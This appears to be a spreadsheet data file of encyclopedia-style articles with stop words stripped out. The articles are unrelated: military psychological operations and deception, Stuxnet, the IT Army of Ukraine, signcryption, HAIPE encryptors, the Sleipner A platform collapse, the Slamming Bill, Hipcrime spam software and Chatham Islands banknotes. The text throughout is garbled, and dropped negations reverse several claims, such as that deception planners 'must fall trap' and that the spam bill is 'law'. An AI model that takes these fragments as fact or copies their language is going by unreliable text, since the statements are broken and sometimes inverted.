takes develop, design, produce, distribute, disseminate, evaluate psyop products actions. psyop conducted authority interagency-coordinated approved psyop programs. psyop program approval process national level requires time sufficient coordination resolution issues; hence, jfcs begin psyop planning early possible ensure execution psyop support operations. must approved psyop program, execution authority, delegation product approval authority psyop execution begin. jfcs request psyop planners immediately initial crisis stages ensure plenty lead time obtain proper authority execute psyop. psyop assets particular value pre-/post-combat operations means influence restrained authorized. psyop must coordinated mildec, opsec ensure deconfliction control, operations compromised, capabilities within coordinated achieve objectives established planning. there must close cooperation coordination psyop staffs order maintain credibility respective audiences, purpose cell. psyop efforts effective personnel thorough understanding language culture included review psyop materials messages. information environment evolves, dissemination psyop products expanding traditional print broadcast sophisticated internet, facsimile messaging, text messaging, emerging media. effectiveness psyop enhanced synchronization coordination core, supporting, related capabilities particularly public affairs (pa), mildec, cno, civil-military operations (cmo), psychological operations planned operations convey selected information indicators foreign audiences influence emotions, motives, objective reasoning, ultimately behavior foreign governments, organizations, groups, individuals. psychological operations group military deception (mildec) mildec described actions executed deliberately mislead adversary decision makers friendly military capabilities, intentions, operations, thereby causing adversary take specific actions inactions) contribute accomplishment friendly forces’ mission. mildec opsec complementary activities mildec seeks encourage incorrect analysis, causing adversary arrive specific false deductions, opsec seeks deny real information adversary, prevent correct deduction friendly plans. effective, mildec operation must susceptible adversary collection systems "seen" credible enemy commander staff. plausible approach mildec planning employ friendly course action (coa) executed friendly forces adversary intelligence verify. however, mildec planners must fall trap ascribing adversary particular attitudes, values, reactions "mirror image" likely friendly actions situation, i.e., assuming adversary respond particular manner based would respond. there always competing priorities resources required deception resources required real operation. reason, deception plan developed concurrently real plan, starting commander's staff's initial estimate, ensure proper resourcing both. encourage incorrect analysis adversary, usually efficient effective provide false purpose real activity create false activity. opsec deception plan least important opsec real plan, since compromise deception expose real plan. this requirement close hold planning ensuring detailed coordination greatest challenge mildec planners. joint staffs, mildec planning oversight responsibility normally organized staff deception element operations directorate joint staff (j-3). mildec core capability. mildec fundamental successful exploits adversary's information systems, processes, capabilities. mildec relies upon understanding adversary commander supporting staff think plan information management support efforts. this requires high degree coordination elements friendly forces’ activities information environment well physical activities. each core, supporting, related capabilities part play development successful mildec maintaining credibility time. while involved provision false information, must aware intent purpose mildec order inadvertently compromise message targeted exploit fissure member adversary's leadership contentious relationship another decision maker example. that message could cause internal strife resulting adversary foregoing intended course action adopting position favorable interests. article title operations security (opsec) opsec core capability. opsec denies adversary information needed correctly assess friendly capabilities intentions. particular, opsec complements mildec denying adversary information required assess real plan disprove deception plan. capabilities exploit opportunities vulnerabilities, cno, opsec essential ensure friendly capabilities compromised. process identifying essential elements friendly information taking measures mask disclosure adversaries part defense-in-depth approach securing friendly information. effective, types security must complement opsec. examples types security include physical security, programs, computer network defense (cnd), personnel programs screen personnel limit authorized access. what occurs, often, data either leaked, stolen, hacked online enemy access decipher information say. this especially true defensive operational security. servicemen servicewomen facebook, multiple blogs, upload photos, lead enemy knowing troop movements locations. with information, setting ambush wreaking havoc support personnel becomes much easier. geo-tagging features cellular phones especially, cause type breach opsec. equipment methods tactics ec-130 ec-130e airborne battlefield command control center (abccc) based basic c-130e platform provided tactical airborne command post capabilities commanders ground commanders threat environments. this ec-130e abccc since retired. ec-130e commando solo earlier version u.s. force national guard psychological operations (psyops) aircraft. this aircraft also employed c-130e airframe, modified using mission electronic equipment retired ec-121s coronet solo aircraft. this airframe served first gulf (operation desert storm), second gulf (operation iraqi freedom) operation enduring freedom. ec-130e eventually replaced ec-130j commando solo retired 2006. ec-130j commando solo modified c-130j hercules used conduct psychological operations (psyop) civil affairs broadcast missions standard military communications bands. missions flown maximum altitudes possible ensure optimum propagation patterns. ec-130j flies either night scenarios equal success, air-refuelable. typical mission consists single-ship orbit offset desired target audience. targets either military civilian personnel. commando solo operated exclusively national guard, specifically 193d special operations wing (193 sow), unit pennsylvania national guard operationally gained force special operations command (afsoc). based harrisburg national guard base (former olmstead afb) harrisburg international airport middletown, pennsylvania. u.s. navy's ec-130q hercules tacamo ("take charge move out") aircraft land-based naval aviation platform served siop strategic communications link aircraft u.s. navy's fleet ballistic missile (fbm) submarine force backup communications link usaf manned strategic bomber intercontinental ballistic missile forces. ensure survivability, tacamo operated solo platform, well away interacting major naval forces sea-based aircraft carrier strike groups carrier wings land-based maritime patrol aircraft operated fleet reconnaissance squadron three (vq-3) fleet reconnaissance squadron four (vq-4), ec-130q eventually replaced u.s. navy's current tacamo platform, boeing 707-based mercury. computer network operations stuxnet stuxnet computer worm discovered june 2010. initially spreads microsoft windows, targets siemens industrial software equipment. while first time hackers targeted industrial systems, first discovered malware spies subverts industrial systems, first include programmable logic controller (plc) rootkit.in 2011, program need know cited statement gary samore, white house coordinator arms control weapons mass destruction, said, "we're glad [the iranians] trouble centrifuge machine allies everything make sure complicate matters them", offering "winking acknowledgement" involvement stuxnet. according british daily telegraph, showreel played retirement party head israel defense forces (idf), gabi ashkenazi, included references stuxnet operational successes chief staff. suter suter military computer program developed systems attacks computer networks communications systems belonging enemy. development program managed safari, secret unit united states force. specialised interfere computers integrated defence systems. suter integrated unmanned aircraft communications.three generations suter developed. suter allows operators monitor enemy radar operators see. suter lets take control enemy's networks direct sensors. suter tested summer 2006, enables invasion links time-critical targets battlefield ballistic missile launchers mobile surface-to-air missile launchers. program tested aircraft ec-130, rc-135, f-16cj. used iraq afghanistan since 2006.u.s. force officials speculated technology similar suter used israeli force thwart syrian radars sneak airspace undetected operation orchard september 2007. evasion defence radar otherwise unlikely f-15s f-16s used equipped stealth technology. psyop (soms-b) special operation media systems (soms-b)--the soms-b ground-based hmmwv mounted radio television broadcast system. like ec-130c/j broadcast television frequencies. soms-b also capability produce programming radio television broadcasts other/integrated radio radio free afghanistan radio free afghanistan (rfa) afghan branch radio free europe radio liberty's (rfe/rl) broadcast services. broadcasts hours daily part 24-hour stream programming conjunction voice america (voa). first aired afghanistan 1985 1993 re-launched january 2002. produces variety cultural, political, informational programs transmitted listeners shortwave, satellite signals provided international broadcasting bureau. rfa's mission promote sustain democratic values institutions afghanistan disseminating news, factual information ideas". radio radio dominant information tool reach wide audiences isolated, mountainous regions. military deployed riabs throughout afghanistan order communicate residents. percent illiteracy rate lack education afghanistan, radio vital communications tool used broadcast information radio ownership exceeds percent. united states military operates approximately riabs hire local afghan afghanistan broadcast information host call-in shows. united states army employed riab systems broadcast anti-taliban anti-al qaeda messages countered taliban propaganda pushing onto taliban frequencies paktia province. advantage employing riab systems ability broadcast vital information immediately large audience event crisis. afghan 50,000 listeners. nawa district governor abdul manaf uses local riab station conduct weekly call-in shows believes riab system best communication tools inform large audience. afghanistan's paktika province, literacy rate percent, estimated percent residents listen radio every day. radio programs transmitted using riab systems provide beneficial information afghan farmers remote areas. isolated, mountainous wazi kwah district paktika province, riab system supplies source outside news. afghan national army commanders riab communicate villagers elders provide thoughts community. afghans information distributed united states military react approaching military convoy purpose u.s.-sponsored agriculture programs. general news, afghans also information outlets riab systems controlled military. special operations first employed riab systems afghanistan 2005 improved ability supply information communicate local population areas operation. terrorists perspective) "terrorists adept integrating physical acts violence they make audio video recordings incidents distribution internet television. their violence becomes theater, staged psychological impact, replayed media io." "terrorists employ capabilities u.s. military doctrine, including five core capabilities psyop, military deception, cno, opsec, supporting related capabilities. they support offensive operations (acts terrorism) defensive operations (e.g., protecting hiding places). they strategically support broad objectives. while terrorists speak write “io,” demonstrate understanding value methods capabilities. terrorists appear particularly adept psyop, counterpropaganda, certain forms opsec deception, driven desire simultaneously reach desired audiences hide enemies. they recognize value various media, including internet, exploit support cause. terrorists supporters capability, manifesting “electronic jihad” rather acts terror." computer network operations there many examples generally done support operations. terrorists integrated cyber attacks thinking, strategies, operations extremely cost-effective harm adversaries.the said cne, penetrating computer networks actually attacking them. gaining access specific networks seen part process terrorists (they distinguish two).as cnd, terrorists aware keeping data secure websites running internet. hamas hizballaha defend websites israeli hackers past defaced them. methods include access controls, encryption, authentication, firewalls, intrusion detection, anti-viral tools, audits, security management, security awareness training. "the taliban recent months waged intensifying information nato forces country, distributing anti-government messages mobile phone networks using twitter claim largely improbable successes foreign combat troops look leave country 2014. rarely passes without taliban spokesman using twitter claim destruction numerous nato armoured vehicles deaths scores western afghan security forces, nato quickly countering twitter feeds. taliban also employ sophisticated network spokesmen distribute messages even mobile radio broadcast service, frequently moves location avoid threat retaliatory airstrikes nato warplanes."the taliban have rely integrate campaign cost-effective method disrupting western forces. this prime example used conjunction psyop achieve objectives. steganography when considers messages could encrypted steganographically e-mail messages, particularly e-mail spam, notion junk e-mail takes whole light. coupled "chaffing winnowing" technique, sender could messages cover tracks once. rumors terrorists using steganography started first daily newspaper today february 2001 articles titled "terrorist instructions hidden online" "terror groups hide behind encryption". july year, article titled even precisely: "militants wire links jihad". citation article: "lately, al-qaeda operatives sending hundreds encrypted messages hidden files digital photographs auction site ebay.com". other media worldwide cited rumors many times, especially terrorist attack 9/11, without ever showing proof. italian newspaper corriere della sera reported qaeda cell captured quaranta mosque milan pornographic images computers, images used hide secret messages (although italian paper ever covered story). today articles written veteran foreign correspondent jack kelley, 2004 fired allegations emerged fabricated stories sources. october 2001, york times published article claiming al-qaeda used steganography encode messages images, transported e-mail possibly usenet prepare execute september 2001 terrorist attack. federal plan cyber security information assurance research development, published april 2006 makes following statements: "...immediate concerns also include cyberspace covert communications, particularly terrorists also foreign intelligence services; espionage sensitive poorly defended data government industry systems; subversion insiders, including vendors contractors; criminal activity, primarily involving fraud theft financial identity information, hackers organized crime groups..." 9–10) "international interest steganography technologies commercialization application exploded recent years. these technologies pose potential threat national security. because steganography secretly embeds additional, nearly undetectable, information content digital products, potential covert dissemination malicious software, mobile code, information great." 41–42) "the threat posed steganography documented numerous intelligence reports." 42)moreover, online "terrorist training manual", "technical mujahid, training manual jihadis" contained section entitled "covert communications hiding secrets inside images."by early 2002, cranfield university thesis developed first practical implementation online real-time counter terrorist steganography search engine. this designed detect likely image steganography transit thereby provide ministry defence intelligence staff realistic approach "narrowing field", suggesting interception capacity never difficulty rather prioritising target media. military deception police search british, al-qaeda member's home, uncovered called "the al-qaeda training manual", techniques instruction book deception, forgery, "blending in", hiding places, covers blend terrorist area operation (usually cities large civilian populations). philosophy mildec concealment activities rather misleading adversaries. psyop terrorist psyop differs american psyop major areas. first, psyop targets foreign adversaries information coordinated many agencies screened published. second, psyop coalition forces "designed bring violence save lives, terrorist psyop frequently directed toward promoting violence threatening civilian populations death destruction. suicide bombers portrayed martyrs rather killers innocent people."the internet main resource spread propaganda al-aqaeda terrorist groups. "according bruce hoffman, taken down, al-qaeda's website alneda.com emphasized three themes: 1)the west implacably hostile islam, address threat language west understands logic violence, jihad option"terrorists also like internet recruit persuade children cause. dorothy denning found, "children taught hate jews westerners, take arms [through cartoons comic-book style pages, bedtime stories, computer games]". opsec terrorists practice high level opsec since need secret successful. whether al-qaeda training manual, online magazines targeted world, training youth jihad camps, opsec first priorities terrorists.secure communications well. september hijackers, example, accessed anonymous hotmail yahoo! accounts computers kinko's public library. messages also coded. three weeks attacks, mohamed atta reportedly received coded email message read: "the semester begins three weeks. we've obtained confirmations studies faculty law, faculty urban planning, faculty fine arts, faculty engineering." faculties referred four targets (twin towers, pentagon, capitol).the list methods goes similar methods used organized crime around world. criticism [stability, reconstruction, coin operations], important targets influence enemy commanders, individuals groups, local international, whose cooperation vital mission’s success. granted, joint army doctrine publications ignore targets psyop counterpropaganda designed influence them. notable activities directly aimed influencing local international audiences functions public affairs, civil affairs, cmos, defense support public diplomacy treated ‘related activities’ doctrine, mentioned all" "there must fundamental change culture isaf approaches operations. stratcom separate line operation, rather integral fully embedded part policy development, planning processes, execution operations. analyzing maximizing stratcom effects must central formulation schemes maneuver execution operations. order affect paradigm shift, isaf must synchronize stratcom stakeholders. implicit change culture clear recognition modern strategic communication credible dialogue, monologue design systems resources deliver messages target audiences effective manner. this population centric campaign effort spared ensure afghan people part conversation. receiving, understanding, amending behavior result messages received audiences effective method gaining genuine trust credibility. this would improve likelihood population accepting isaf messages changing behavior result." also fifth dimension operations radicalization cyberware electronic warfare black propaganda cyberwarfare communications security command control warfare disinformation historical revisionism gatekeeper (politics) industrial espionage irregular warfare iwar network-centric warfare political warfare psychological warfare public affairs (military) information operations roadmap propaganda mexican drug institute world politics bolivarian propaganda references bibliography external links u.s. department defense information operations related documents operations security 3-13.3) military deception 3-13.4) destabilizing terrorist networks: disrupting manipulating information flows global terrorism, yale information society project conference paper (2005). seeking symmetry fourth generation warfare: information operations ideas, presentation (pdf slides) bantle institute national security counterterrorism (insct) symposium, syracuse university (2006). taipale, seeking symmetry information front: confronting global jihad internet, national strategy rev. (summer 2007). white house</t>
  </si>
  <si>
    <t>IT Army of Ukraine</t>
  </si>
  <si>
    <t>army ukraine (ukrainian: it-армія україни) volunteer cyberwarfare organisation created february 2022 fight digital intrusion ukrainian information cyberspace beginning russian invasion ukraine february 2022. group also conducts offensive cyberwarfare operations, chief head state special communications service ukraine victor zhora said enlisted hackers would attack military targets. formation february 2022, minister digital transformation first vice prime minister ukraine, mykhailo fedorov announced creation army, mainly coordintating efforts telegram.according reuters, ukrainian government asked volunteers country's hacker underground help protect critical infrastructure conduct cyber spying missions russian troops. yegor aushev, co-founder ukrainian cybersecurity firm hacken, wrote, "ukrainian cybercommunity! it's time involved cyber defense country," asking hackers cybersecurity experts submit application listing specialties, malware development professional references. aims volunteers joined group divided offensive defensive cyber units. while offensive volunteer unit would help ukraine's military conduct digital espionage operations invading russian forces, defensive unit would employed defend infrastructure power plants water systems.the ukrainian government used twitter telegram share list russian belarusian targets army attack. russian ransomware operators responded offering assistance counter ukrainian effort. activities fedorov requested assistance cyber specialists tweeted telegram list websites russian business state organizations. february 2022, army hacked website moscow stock exchange. army posted taken five minutes render website inaccessible. day, army hacked website sberbank, largest bank russia. army also launched attacks russian belarusian sites, including government websites russia belarus, belarusian state news agency belta, among others. according reuters, group targets russian power grids railways prevent russian infrastructure reaching ukraine. this included technologies glonass. eight hundred russian websites, including roscosmos, attacked army, june july they posted congratulatory messages ukrainian constitution websites. besides that, distributed denial service attacks carried army crippled russian ability work systems extended periods. ministry digital transformation reported cyberattacks 6000 russian resource period february july references external links official website army ukraine telegram</t>
  </si>
  <si>
    <t>Hew Raymond Griffiths</t>
  </si>
  <si>
    <t>raymond griffiths (born november 1962, accused united states ring leader drinkordie dod, underground software infringement network, using online identity "bandido". griffiths living berkeley vale central coast region nsw, australia placed remand silverwater correctional centre. after fighting extradition almost years, griffiths finally extradited australia united states february 2007, appeared magistrate judge barry portez u.s. district court alexandria, virginia. april, announced u.s. department justice griffiths entered plea guilty. case interest australian resident indicted court virginia, united states copyright infringement conspiracy infringe copyright code. raymond griffiths, born united kingdom, never point physically left australia since arriving adopted country early age. this unusual situation extradition targeted fugitive dangerous person financially profited activities. however, australian courts executive government agreed treat griffiths' activities taken place jurisdiction. case therefore highlights serious consequences australian internet users charged distributing copyright-protected material. griffiths' extradition controversial australia, actions criminal. matter griffiths cited example bilateral arrangements lead undesirable effects loss sovereignty described draconian outcomes. june 2007 griffiths sentenced months prison conspiracy commit copyright infringement. taking account years spent australian prisons prior sentencing, served months griffiths' sentence attracted significant attention australia, attention united states countries recently signed, currently negotiating, bilateral free trade agreements usa. griffiths finally returned australia march 2008, weeks illegal alien immigration detention system following release prison january 2008 (australia day). condition repatriation australia never re-enter united states, country never visited extradited also copyright infringement drinkordie operation buccaneer warez references</t>
  </si>
  <si>
    <t>Signal operating instructions</t>
  </si>
  <si>
    <t>signal operating instructions (soi) communications-electronics operation instructions (ceoi) u.s. military terms type combat order issued technical control coordination communications within command. they include current up-to-date information covering radio call signs frequencies, telephone directory, code-words (for rudimentary encryption), visual sound signals. designated battalion signal officer prepares battalion conformance higher headquarters. during operations, changed daily. since fielding sincgars system, however, paper generally faded army use. electronic generated, distributed loaded along cryptographic keys.the title used early 1970s changed ceoi changed back 1980s. references external links sample soi, 11-1 appendix</t>
  </si>
  <si>
    <t>Signcryption</t>
  </si>
  <si>
    <t>cryptography, signcryption public-key primitive simultaneously performs functions digital signature encryption. encryption digital signature fundamental cryptographic tools guarantee confidentiality, integrity, non-repudiation. until 1997, viewed important distinct building blocks various cryptographic systems. public schemes, traditional method digitally sign message followed encryption (signature-then-encryption) problems: efficiency high cost summation, case arbitrary scheme cannot guarantee security. signcryption relatively cryptographic technique supposed perform functions digital signature encryption single logical step effectively decrease computational costs communication overheads comparison traditional signature-then-encryption schemes. signcryption provides properties digital signatures encryption schemes efficient signing encrypting separately. this means least aspect efficiency (for example computation time) better hybrid digital signature encryption schemes, particular model security. note sometimes hybrid encryption employed instead simple encryption, single session-key reused several encryptions achieve better overall efficiency across many signature-encryptions signcryption scheme session-key reuse causes system lose security even relatively weak model. this reason random session used message hybrid encryption scheme given level security (i.e., given model, cpa), signcryption scheme efficient simple signature-hybrid encryption combination. history first signcryption scheme introduced yuliang zheng 1997. zheng also proposed elliptic curve-based signcryption scheme saves computational communication costs compared traditional elliptic curve-based signature-then-encryption schemes. there also many signcryption schemes proposed throughout years, problems limitations, offering different levels security computational costs. scheme signcryption scheme typically consists three algorithms: generation (gen), signcryption (sc), unsigncryption (usc). generates pair keys user, generally probabilistic algorithm, likely deterministic. signcryption scheme following properties: correctness: signcryption scheme verifiably correct. efficiency: computational costs communication overheads signcryption scheme smaller best known signature-then-encryption schemes provided functionalities. security: signcryption scheme simultaneously fulfill security attributes encryption scheme digital signature. such additional properties mainly include: confidentiality, unforgeability, integrity, non-repudiation. some signcryption schemes provide attributes public verifiability forward secrecy message confidentiality others provide them. such properties attributes required many applications others require them. hereunder, above-mentioned attributes briefly described.confidentiality: computationally infeasible adaptive attacker gain partial information contents signcrypted text, without knowledge sender's designated recipient's private key. unforgeability: computationally infeasible adaptive attacker masquerade honest sender creating authentic signcrypted text accepted unsigncryption algorithm. non-repudiation: recipient ability prove third party (e.g. judge) sender sent signcrypted text. this ensures sender cannot deny previously signcrypted texts. integrity: recipient able verify received message original sent sender. public verifiability: third party without need private sender recipient verify signcrypted text valid signcryption corresponding message. forward secrecy message confidentiality: long-term private sender compromised, able extract plaintext previously signcrypted texts. regular signcryption scheme, long-term private compromised, previously issued signatures trustworthy more. since threat exposure becoming acute cryptographic computations performed frequently poorly protected devices mobile phones, forward secrecy seems essential attribute systems. applications signcryption seen several applications including following: secure authentic email. e-commerce m-commerce applications often require confidentiality, authenticity, perhaps non-repudiation. also authenticated encryption references</t>
  </si>
  <si>
    <t>High Assurance Internet Protocol Encryptor</t>
  </si>
  <si>
    <t>high assurance internet protocol encryptor (haipe) type encryption device complies national security agency's haipe (formerly haipis, high assurance internet protocol interoperability specification). cryptography used suite suite also specified part cryptographic modernization program. haipe based ipsec additional restrictions enhancements. enhancements includes ability encrypt multicast data using "preplaced key" (see definition list cryptographic types). this requires loading haipe devices participate multicast session advance data transmission. haipe typically secure gateway allows enclaves exchange data untrusted lower-classification network. examples haipe devices include: l3harris technologies' encryption products kg-245x 10gbit/s (haipe v3.1.2 foreign interoperable), kg-245a fully tactical gbit/s (haipe v3.1.2 foreign interoperable) redeagle viasat's altasec productskg-250, kg-255 gbit/s] general dynamics mission systems taclane productsflex (kg-175f) (kg-175x) nano (kg-175n) airbus defence space ectocryp transparent cryptography three devices compliant haipe v3.0.2 specification remaining devices haipe version 1.3.5, couple notable limitations: limited support routing protocols open network management. haipe encryption device, looking destination address packet internal security association database (sad) picking encrypted tunnel based appropriate entry. communications, haipes internal security policy database (spd) tunnels appropriate algorithms settings. lack support modern commercial routing protocols haipes often must preprogrammed static routes cannot adjust changing network topology. couple haipe devices combine functionality router encryptor haipe version approved. general dynamics completed taclane version (kg-175r), house black cisco router, viasat communications coming line network encryptors version above. cisco partnering harris corporation propose solution called swat1there haipe variant implements ukeo algorithms place suite cassidian entered haipe market ectocryp range. ectocryp blue haipe version compliant provides number haipe extensions well support network quality service (qos). harris also entered haipe market bid/2370 cryptographic unit (ecu).in addition site encryptors haipe also inserted client devices provide wired wireless capabilities. examples include l3harris technologies' kov-26 talon kov-26b talon2, harris corporation's kiv-54 prc-117g radio. haipe managers viasat general dynamics mission systems develop propriety software managing haipe devices, vine respectfully. specifications list support viasat haipes, kg-250x kg-250xs data sheet vine lists supported viasat network encryptors.both haipe management haipe device implementations required compliant haipe version common mibs. assurance cross vendor interoperability require additional effort. example management application supports haipe l3harris common haipe manager (which operates l3harris products). also arpanet encryption devices encryption systems references external links cnss policy governing haipe</t>
  </si>
  <si>
    <t>Sleipner A</t>
  </si>
  <si>
    <t>sleipner combined accommodations, production processing offshore platform sleipner east field norwegian sector north sea. condeep-type platform, built norway company norwegian contractors equinor. known catastrophic failure august 1991, design flaw, resulted error caused unconservative concrete codes inaccurate finite element analysis modelling tricell, formed part ballasting/flotation system. location sleipner located sleipner east field north sea. also satellite fields–gungne, loke, alpha north, sigyn, volve volve south–are tied-back sleipner addition operations, platform used remote operation center sleipner wellhead platform. sleipner operated sleipner umbilical cable. addition, sleipner carbon dioxide treatment platform linked physically sleipner platform bridge. design platform designed accommodate roughly people. platform deck meters (197 height meters (689 ft).the original hull gravity base made support pilings concrete ballast chambers three four shafts rise upon deck sits. once fully ballasted, hull floor. there chambers, four formed 'legs' supporting facility case sleipner rig. hull redesigned accident sleipner platform successfully completed june 1993. 1991 accident collapse original hull collapsed final construction design flaw. towed gandsfjord lowered water controlled ballasting operation rate meter minutes. this necessary fitment deck platform hull. hull lowered 65-meter (213 mark, rumbling noises heard followed sound water pouring unit. cell wall failed serious crack developed, water poured rate great deballasting pumps deal with. within minutes hull began sinking rate meter minute. structure sank deeper 210-meter (690 fjord, buoyancy chambers imploded rubble struck floor fjord, creating richter magnitude scale earthquake. later analysis showed failure would occur meters (203 feet).no injured accident. investigation post-accident investigation sintef norway discovered root cause failure resulted inaccurate nastran calculations design structure. stresses ballast chambers underestimated concrete walls designed thin resist foreseeable hydrostatic pressure submerged. pressure increased, walls failed cracked, allowing water enter tank uncontrolled rate, eventually sinking hull. after accident, project leaders norwegian contractors brought statoil board, expecting severe repercussions. director instead asked famous question "can make schedule?" contractors replied "yes can". hull completed schedule. computer-aided catastrophes computer-aided catastrophes, short, sleipner incident presented article, provide extremely valuable lessons practising engineers working numerical simulation tools finite element method. reason poor finite element result sleipner incident studied detail nafems benchmark challenge number references</t>
  </si>
  <si>
    <t>Slamming Bill</t>
  </si>
  <si>
    <t>slamming bill (anti-slamming amendments act, 1618) bill proposed united states senate 1998. never passed. this bill often mentioned spammers order make false impression spam legal. bill bill originally dealt telephone slamming. some editions contained controversial part required senders unsolicited email include name, electronic physical address, telephone number beginning message, also include statement transmissions mail recipient person stopped cost recipient sending reply originating electronic mail address word "remove" subject line". bill must passed senate house become law. edition bill passed senate house. another edition passed house senate, controversial part discarded public protests.therefore, bill law. spammer's claim incorrect bill law, since never passed senate house. most spammers violate bill provide email addresses, real names, addresses phone numbers beginning messages. some spammers mention section 301, paragraph (a)(2)(c). this refers edition proposed house. edition, whole section 301, paragraph (a)(2) dropped public protests. some spammers mention bill sending messages outside united states recipients also outside united states. cases often changed something like "international regulation", make claim look less obviously bogus. problems bill would greatly increase time wasted mass unsolicited email. much faster delete spam messages reply "remove" word delete them. getting "remove" reply, spammers would know address active use, could send spam sell spammers. reasons, many users reply email messages "remove" word. unsolicited emailers would able send number commercial advertisement still claim comply law. this permitted anyone send unsolicited email number users. external links spam senate bill 1618 spam 1618 h.r. 4176 about junk mail spam references</t>
  </si>
  <si>
    <t>Hilbert spectroscopy</t>
  </si>
  <si>
    <t>hilbert spectroscopy uses hilbert transforms analyze broad spectrum signals gigahertz terahertz frequency radio. suggested quickly analyze liquids inside airport passenger luggage. references</t>
  </si>
  <si>
    <t>Hipcrime (Usenet)</t>
  </si>
  <si>
    <t>hipcrime screenname usenet user software application distributed presumably written individual group. name derives neologism john brunner science fiction novel stand zanzibar. hipcrime's newsagent hipcrime's newsagent software free open-source usenet control client. program written java allows user auto-cancel messages usenet based author, subject, organization, message-id, path. also allows user replace body message text choosing. software also monitors posts choose reposts removed. additionally, allows regular users usenet administrators create remove) entire newsgroups. inc. classified denial service software, well flooder software, specific type denial service attack. hipcrime's activeagent hipcrime referred leading usenet terrorist" james farmer, maintainer spamfaq: part understanding nanae. andrew leonard, book bots: origin species, also credits hipcrime creating earliest web-distributed spambot. this bot, known hipcrime's activeagent, java applet allowed anybody browser send mass volumes unsolicited e-mail messages. activeagent since expanded open-source application (known marketcom's mktagent) relied upon heavily largest e-mail spam stock pump dump gangs. also list spammers references external links early version hipcrime's newsagent gibbering clones future usenet? "tim skirvin's killfile dungeon entry hipcrime". june 2002. archived original september 2007. hipcrime: history urls july 1996 1998 june 1998</t>
  </si>
  <si>
    <t>History of Chatham Islands numismatics</t>
  </si>
  <si>
    <t>1999 private organisation, chatham islands note corporation, issued banknotes celebrate chatham islands first human-inhabited land enter third millennium. banknotes cannot declared legal tender, obligation anyone accept notes issued chatham island note corporation transaction. these notes reported accepted merchants chatham islands, served directors issuer. chatham islands note corporation initially based christchurch. agent providing notes numismatic trade leon morel, fellow royal numismatic society zealand melbourne, victoria. corporation later shifted base operations waitangi. face value notes pegged rate zealand dollar. they unusual first series included dollar notes, second series includes note. legal tender reserve bank zealand clarified notes legal tender. reserve bank deputy governor murray sherwin mentioned "whilst chatham island dollars fun,... people want undertake transactions, that's fine too." series series notes consist denominations, exhibit strong influence american currency designs. there printed late 1999, still time release january 2000. they printed polymer tyvek paper artwork timely marketing promotions limited, christchurch dunedin, zealand. tyvek plastic-type material, notes dual-denominated—in cents well dollars. same-numbered sets came cardboard folders, also bear completely different hologram, compared currency issue. there three printings seriesfull sets series scarce. series notes, consisting denominations, printed time year 2000 release 2001. they printed cotton-fibre paper chan wanich security printing company limited, thailand. front notes similar series notes, apart dates details. again, notes dual-denominated cents dollars. there also three printings series same-serial numbered sets produced, cardboard folders, different hologram first currency issue. this hologram unique incorporates albatross bird flies viewed special security device. 2001, coin circulation time series notes. 5,000 piece issue planned; however, informed intention issue coin, reserve bank zealand banned issue, despite fact coin circulation zealand. estimated pieces ended numismatic trade. balance, remaining held cinc, never minted. description assist collectors dealers, catalogue numbering system provided. below, 'work' numbers (indicated letter 'w') items, assigned clarity. series date '2000' four corners. notes chatham islands left under-print chatham islands taiko right. green frame backs notes. printer's name bottom backs notes. hologram depicts globe showing asia-pacific region '1st' superimposed, inner circle words 'world first' 'authentic' (which seen depending direction note tilted), outer circle, rainbow pattern going around like flywheel. notes same-serial numbered folder issue '1st' printed white hologram, interlocking pattern consisting year 2000. (the sea) w1a. dollars (200 cents). front: purple grey-blue under-print. back: lobster, chatham islands black robin. theme: sea.w1b. same-serial numbered folder issue. currency issue. (the community) w2a. three dollars (300 cents). front: above, purple red-pink under-print. back: first motor vehicle, community chatham islands black robin. theme: community.w2b. same-serial numbered folder issue. currency issue. (the history) w3a. dollars (1,000 cents). front: above, green yellow-brown under-print. back: history chatham islands black robin. theme: history.w3b. same-serial numbered folder issue. currency issue. (the land) w4a. fifteen dollars (1,500 cents). front: above, green brown under-print.&lt;/ref&gt; back: nikau palm, chathams' horse power chatham islands black robin. theme: land.w4b. same-serial numbered folder issue. currency issue. series they made cotton fibre paper. date 2001 three corners. notes albatross replacing chatham islands left under-print. chatham islands taiko right. olive-green-black frames backs notes. currency notes ones same-numbered sets computer style numbering serial numbers whereas replacement notes block numbers serial numbers. hologram notes depicts compass wavy pattern outer silver area. chatham islands chatham islands note corporation seen note tilted direction rock lobster seen note tilted direction. printer name bottom backs notes. (horse racing) w5a. three dollars (300 cents). front: pink yellow under-print. back: horse racing, chatham islands jockey club (1873), woytek's fool. theme: horse racing.w5b. same-serial numbered issue. currency issue.w5p. currency issue, serial number 'a000000'. (printer's specimen). w5r. currency issue, serial number star (replacement note). (the ancestors) w6a. five dollars (500 cents). front: above, green yellow under-print. back: morioris, woytek's generations. theme: ancestors.w6b. same-serial numbered issue. currency issue.w6p. currency issue, serial number 'a000000'. (printer's specimen). w6r. currency issue, serial number star (replacement note). (center message) w7a. eight dollars (800 cents). front: above, lilac blue under-print. back: dawn spring symphony guardians hakepa, pitt island. chatham islands. theme: center message.w7b. same-serial numbered issue. currency issue.w7p. currency issue, serial number 'a000000'. (printer's specimen). w7r. above, serial number star (replacement note). (wrestler) w8a. dollars (1,000 cents). front: above, lilac-blue green-yellow under-print. back: jacobs world champion wrestler, woytek's warrior. theme: wrestler.w8b. same-serial numbered issue. currency issue.w8p. currency issue, serial number 'a000000'. (printer's specimen). w8r. currency issue, serial number star (replacement note). (sunderland flying boat) w9a. fifteen dollars (1,500 cents). front: above, blue, pink yellow under-print. back: short sunderland, woytek's astronomer. theme: flying boat.w9b. same-serial numbered issue. currency issue.w9p. currency issue, serial number 'a000000'. (printer's specimen). w9r. currency issue, serial number star (replacement note). collector series wcsi. series same-serial numbered folder issue (w1b w4b). wcsii. series same-serial numbered issue (w5b w9b). uncut sheets these issued series w9). these four-digit serial number range s0001 s1000. wusi. 4×$3. wusii. 3×$5. wusiii. 3×$8. wusiv. 2×$10. wusv. 2×$15. signature chart director corporation secretary treasury. series clint mcinnes. john day. series indecipherable. day.error notes listed, even though exist, postal notes postal orders issued chatham islands. wci. milled edge coin 1-1/4 inches diameter limited number (less known exist) scarce obverse: head-and-shoulders portrait tommy solomon (born 1884, died 1933. popularly believed last full-blooded moriori) splitting date '2001'. inscription,'five millennium dollars' portrait. reverse: chatham islands '$5' below. inscribed, 'chatham islands zealand territories south pacific'. wcii. sterling silver milled edge coin inches diameter scarce obverse: portrait king george (ruled 1760–1820) based benedetto pistrucci's portrait used british crown 1817–20, 5-shilling crown) 1818–20, sovereign 1817–20, sovereign 1818 1820, pounds pounds pattern coins 1820. monogram iii' split forehead 